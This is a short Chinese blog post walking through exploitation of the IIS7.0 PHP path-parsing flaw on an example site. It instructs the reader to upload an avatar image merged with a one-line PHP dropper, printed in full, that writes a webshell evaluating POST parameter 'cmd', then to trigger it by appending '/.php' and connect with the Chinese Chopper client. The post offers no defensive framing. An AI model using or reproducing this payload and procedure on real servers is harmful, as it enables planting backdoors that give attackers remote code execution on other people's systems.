IIS7.0 php错误文件解析漏洞利用实例

分类:安全 | 2012-03-16 | 撸过 115 次
0人扯谈

得到www.webshell.cc(仅为举例,非真实)web服务为IIS7.0

www.webshell.cc/robots.txt后面加上/任意字符.php成功解析为php

注册个用户名,找到头像上传地址,上传一个正常图片加一句话小马合并起来的图片一句话马

<?fputs(fopen(bin4ry.php,w),<?eval($_POST[cmd]);?>)?>

如果文件被成功解析,那就会在图片当前目录生成bin4ry.php里面内容为一句话,密码cmd

上传后得到图片地址,在图片后加上/.php 成功解析,那么图片目录就会生成bin4ry.php
用菜刀连接

作者 nios

本站内容均为原创,转载请务必保留署名与链接!
IIS7.0 php错误文件解析漏洞利用实例:https://www.webshell.cc/3374.html

随机日志